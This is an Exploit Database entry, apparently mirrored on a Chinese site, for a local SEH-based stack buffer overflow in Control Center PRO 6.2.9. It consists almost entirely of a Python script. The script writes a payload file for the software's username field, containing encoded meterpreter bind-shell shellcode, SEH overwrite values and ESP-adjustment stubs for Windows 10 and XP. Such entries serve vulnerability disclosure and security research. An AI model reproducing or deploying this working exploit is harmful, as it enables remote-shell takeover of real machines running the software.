Control Center PRO 6.2.9 – Local Stack Based Buffer Overflow (SEH)

• Exploit Database
• 119 阅读

• 作者： sasaga92
  日期： 2019-11-12
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/47645/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149

  # Exploit Title: Control Center PRO 6.2.9 - Local Stack Based BufferOverflow (SEH) # Date: 2019-11-09 # Exploit Author: Samir sanchez garnica @sasaga92 # Vendor Homepage: http://www.webgateinc.com/wgi/eng/products/list.php?ec_idx1=P610 # Software Link: http://www.webgateinc.com/wgi/eng/products/list.php?ec_idx1=P610&ptype=view&page=&p_idx=90&tab=download&#tabdown # Version: 6.2.9 # Tested: Windows 10 pro N and Windows XP SP3 # CVE : N/A   #!/usr/bin/python &apos;&apos;&apos; Existe una vulnerabilidad de desbordamiento de pila, una vez se intenta hacer uso del modulo crear usuario, en el campo username/nombre, copiando una cantidad considerable de strings, la cual no es controlada por el software y se produce una sobreescritura del SEH) &apos;&apos;&apos;   import sys import random import string import struct import argparse   def pattern_create(_type,_length): _type = _type.split(" ")   if _type[0] == "trash": return _type[1] * _length elif _type[0] == "random": return &apos;&apos;.join(random.choice(string.lowercase) for i in range(_length)) elif _type[0] == "pattern": _pattern = &apos;&apos; _parts = [&apos;A&apos;, &apos;a&apos;, &apos;0&apos;] while len(_pattern) != _length: _pattern += _parts[len(_pattern) % 3] if len(_pattern) % 3 == 0: _parts[2] = chr(ord(_parts[2]) + 1) if _parts[2] > &apos;9&apos;: _parts[2] = &apos;0&apos; _parts[1] = chr(ord(_parts[1]) + 1) if _parts[1] > &apos;z&apos;: _parts[1] = &apos;a&apos; _parts[0] = chr(ord(_parts[0]) + 1) if _parts[0] > &apos;Z&apos;: _parts[0] = &apos;A&apos; return _pattern else: return "Not Found"     def generate_file(_name_file, _payload): print _payload print "[+] Creando Archivo malicioso" _name_file = open(_name_file,"w+") _name_file.write(_payload) _name_file.close() print "[+] Payload de {0} bytes generado, exitosamente.".format(len(_payload))   def main(): _parser = argparse.ArgumentParser() _parser.add_argument("--os", dest="os", help="introduce el os, win10, winxp", required=True) _args = _parser.parse_args() #badchars 0x0a, 0x0d, >= 0x80   _name_exploit = "ControlCenterPRO_v6_2_9.txt"   #sudo ./msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -e x86/alpha_mixed EXITFUNC=seh -f c -b &apos;\x00\x0a\x0d&apos; BufferRegister=ESP _shellcode = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b" "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58" "\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x69\x78\x4e\x62\x37\x70" "\x43\x30\x45\x50\x31\x70\x6f\x79\x4d\x35\x46\x51\x6f\x30\x50" "\x64\x4e\x6b\x72\x70\x50\x30\x4e\x6b\x46\x32\x64\x4c\x6e\x6b" "\x71\x42\x32\x34\x6c\x4b\x61\x62\x34\x68\x66\x6f\x6e\x57\x30" "\x4a\x76\x46\x76\x51\x49\x6f\x4e\x4c\x47\x4c\x63\x51\x63\x4c" "\x75\x52\x76\x4c\x35\x70\x49\x51\x58\x4f\x54\x4d\x75\x51\x4b" "\x77\x6b\x52\x39\x62\x46\x32\x53\x67\x4c\x4b\x50\x52\x76\x70" "\x4c\x4b\x71\x5a\x77\x4c\x6e\x6b\x42\x6c\x46\x71\x32\x58\x6a" "\x43\x61\x58\x56\x61\x68\x51\x76\x31\x4c\x4b\x73\x69\x55\x70" "\x57\x71\x4b\x63\x4e\x6b\x67\x39\x66\x78\x6d\x33\x56\x5a\x32" "\x69\x6c\x4b\x35\x64\x4c\x4b\x55\x51\x6a\x76\x50\x31\x59\x6f" "\x4c\x6c\x39\x51\x58\x4f\x64\x4d\x35\x51\x5a\x67\x54\x78\x79" "\x70\x53\x45\x5a\x56\x67\x73\x71\x6d\x49\x68\x45\x6b\x73\x4d" "\x31\x34\x63\x45\x68\x64\x51\x48\x4c\x4b\x70\x58\x44\x64\x37" "\x71\x49\x43\x72\x46\x4c\x4b\x36\x6c\x52\x6b\x4e\x6b\x30\x58" "\x77\x6c\x36\x61\x4a\x73\x4e\x6b\x77\x74\x4c\x4b\x56\x61\x7a" "\x70\x6e\x69\x42\x64\x45\x74\x71\x34\x63\x6b\x61\x4b\x51\x71" "\x52\x79\x52\x7a\x72\x71\x39\x6f\x39\x70\x73\x6f\x51\x4f\x73" "\x6a\x4e\x6b\x64\x52\x58\x6b\x6c\x4d\x73\x6d\x61\x78\x55\x63" "\x77\x42\x55\x50\x67\x70\x42\x48\x73\x47\x54\x33\x36\x52\x63" "\x6f\x46\x34\x73\x58\x52\x6c\x63\x47\x44\x66\x56\x67\x69\x6f" "\x48\x55\x6d\x68\x5a\x30\x45\x51\x77\x70\x37\x70\x75\x79\x58" "\x44\x70\x54\x42\x70\x53\x58\x44\x69\x4f\x70\x30\x6b\x57\x70" "\x39\x6f\x5a\x75\x42\x4a\x34\x4b\x42\x79\x52\x70\x4d\x32\x39" "\x6d\x62\x4a\x46\x61\x32\x4a\x37\x72\x32\x48\x69\x7a\x66\x6f" "\x69\x4f\x39\x70\x4b\x4f\x4b\x65\x4e\x77\x30\x68\x47\x72\x63" "\x30\x52\x31\x33\x6c\x4e\x69\x7a\x46\x61\x7a\x56\x70\x61\x46" "\x30\x57\x75\x38\x6b\x72\x69\x4b\x44\x77\x73\x57\x79\x6f\x69" "\x45\x4d\x55\x6b\x70\x63\x45\x46\x38\x52\x77\x50\x68\x38\x37" "\x48\x69\x45\x68\x4b\x4f\x69\x6f\x59\x45\x46\x37\x52\x48\x71" "\x64\x68\x6c\x67\x4b\x39\x71\x59\x6f\x6a\x75\x52\x77\x6e\x77" "\x45\x38\x63\x45\x32\x4e\x42\x6d\x30\x61\x59\x6f\x4e\x35\x31" "\x7a\x35\x50\x30\x6a\x46\x64\x50\x56\x52\x77\x61\x78\x47\x72" "\x58\x59\x59\x58\x53\x6f\x39\x6f\x49\x45\x6b\x33\x48\x78\x63" "\x30\x73\x4e\x64\x6d\x4c\x4b\x56\x56\x53\x5a\x53\x70\x75\x38" "\x77\x70\x52\x30\x63\x30\x45\x50\x33\x66\x50\x6a\x53\x30\x51" "\x78\x70\x58\x79\x34\x31\x43\x4a\x45\x79\x6f\x4e\x35\x4e\x73" "\x56\x33\x51\x7a\x67\x70\x43\x66\x61\x43\x56\x37\x75\x38\x35" "\x52\x79\x49\x48\x48\x71\x4f\x4b\x4f\x7a\x75\x6e\x63\x6b\x48" "\x77\x70\x51\x6e\x76\x67\x36\x61\x39\x53\x74\x69\x6b\x76\x44" "\x35\x78\x69\x7a\x63\x6f\x4b\x59\x6e\x76\x6e\x30\x32\x6b\x5a" "\x61\x7a\x33\x30\x56\x33\x39\x6f\x78\x55\x63\x5a\x65\x50\x79" "\x53\x41\x41")   _offset = 664 _padding = 40000 _nseh = "\x42\x42\x77\x08" _seh = struct.pack("<L", 0x637c1571) #0x0258107E pop edi # pop esi # retn lib_VoiceEngine_dll32.dll 3 8 one-reg, stack edi, esinonull, ascii   if _args.os.lower() == "win10": _esp_prepend ="\x54\x58\x66\x05\x34\x18\x50\x5C" _inject = pattern_create("trash A",_offset) _inject += _nseh _inject += _seh _inject += "A" * 4 _inject += _esp_prepend   _inject += _shellcode _inject += pattern_create("trash D",_padding-len(_inject))   elif _args.os.lower() == "winxp": _esp_prepend = "\x54\x58\x66\x05\x7C\x0C\x50\x5C" _inject = pattern_create("trash A",_offset) _inject += _nseh _inject += _seh _inject += "A" * 4 _inject += _esp_prepend _inject += "A" * 16   _inject += _shellcode _inject += pattern_create("trash D",_padding-len(_inject)) else: print("[-] os select is not support, select win10 or winxp")     generate_file(_name_exploit, _inject)   if __name__ == "__main__": main()